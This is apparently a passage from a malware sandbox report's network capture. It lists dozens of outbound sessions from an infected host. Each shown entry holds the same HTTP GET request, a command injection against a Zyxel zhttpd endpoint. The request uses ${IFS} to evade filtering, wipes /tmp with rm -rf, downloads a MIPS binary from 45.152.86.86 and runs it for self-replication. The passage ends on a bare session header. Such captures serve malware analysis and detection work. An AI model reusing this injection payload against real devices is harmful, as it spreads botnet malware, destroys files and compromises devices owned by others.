                                        Mar 31, 2024 09:22:14.537206888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7350192.168.2.235988094.213.226.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.537252903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7351192.168.2.2347814186.197.162.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.537292004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7352192.168.2.2360692109.219.79.34443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.537341118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7353192.168.2.235426440.196.130.113443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.537381887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7354192.168.2.2335516176.129.4.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.537416935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7355192.168.2.2342604155.142.102.123443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.537460089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7356192.168.2.234953854.49.240.149443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.537498951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7357192.168.2.2356264172.130.105.95443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.537552118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7358192.168.2.2351858137.37.183.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.537604094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7359192.168.2.2360148161.105.39.25443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.537645102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7360192.168.2.2342230138.186.11.227443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.537684917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7361192.168.2.2345264136.70.121.129443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.537715912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7362192.168.2.2336920146.65.14.38443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.537760973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7363192.168.2.235494025.130.15.232443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.537807941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7364192.168.2.234083876.130.234.95443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.537853956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7365192.168.2.2357466221.176.192.223443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.537904024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7366192.168.2.235039668.209.56.141443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.537940979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7367192.168.2.2352688129.19.178.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.537974119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7368192.168.2.235958420.55.192.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.538024902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7369192.168.2.2354968151.23.195.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.538080931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7370192.168.2.2339906201.236.38.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.538125038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7371192.168.2.234045679.75.69.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.538177013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7372192.168.2.2341936182.236.228.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.538213015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7373192.168.2.2333048209.209.115.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.538232088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7374192.168.2.235902847.66.221.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.538273096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7375192.168.2.23406088.139.109.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.538320065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7376192.168.2.2347764185.1.168.202443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.538355112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7377192.168.2.236064063.117.33.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.538399935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7378192.168.2.2345542141.95.104.130443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.538449049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7379192.168.2.235820473.14.52.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.538494110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7380192.168.2.2334232160.225.129.111443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.538532019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7381192.168.2.2340010176.40.235.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.538587093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7382192.168.2.2344726211.56.33.111443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.538619995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7383192.168.2.2336672114.146.59.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.538669109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7384192.168.2.235488899.46.218.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.538686991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7385192.168.2.2345278112.77.244.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.538738966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7386192.168.2.2339968117.133.54.226443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.538767099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7387192.168.2.233786860.154.98.169443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.538805962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7388192.168.2.2335162165.206.177.223443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.538847923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7389192.168.2.2350406129.127.41.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.538894892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7390192.168.2.235978644.20.99.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.538945913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7391192.168.2.2360636137.70.44.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.538975000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7392192.168.2.2359146184.38.200.136443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.539014101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7393192.168.2.2337996170.200.227.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.539061069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7394192.168.2.235210650.58.197.130443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.539104939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7395192.168.2.2344774162.93.148.60443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.539148092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7396192.168.2.2354784223.43.233.53443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.539192915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7397192.168.2.2357970151.196.233.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.539220095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7398192.168.2.234952213.177.39.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.539273024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7399192.168.2.233537243.60.223.70443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.539323092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7400192.168.2.235843695.150.49.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.539359093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7401192.168.2.2352318175.69.168.240443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.539402962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7402192.168.2.2341818209.58.145.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.539449930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7403192.168.2.2356934117.79.39.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.539501905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7404192.168.2.2349912137.44.56.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.539535046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7405192.168.2.2351244175.198.60.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.539575100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7406192.168.2.234305488.146.70.25443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.539616108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7407192.168.2.2341896138.237.57.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.539659977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7408192.168.2.235861214.99.95.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.539705992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7409192.168.2.2347002196.250.20.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.539757013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7410192.168.2.2342064184.206.25.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.539788961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7411192.168.2.2347514105.230.149.102443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.539836884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7412192.168.2.235203251.214.144.211443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.539886951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7413192.168.2.233548671.162.242.165443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.539935112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7414192.168.2.235590691.86.133.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.539962053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7415192.168.2.2338388125.233.10.239443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.540018082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7416192.168.2.2334908117.102.96.164443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.540049076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7417192.168.2.2355198164.182.148.216443
                                        TimestampBytes transferredDirectionData
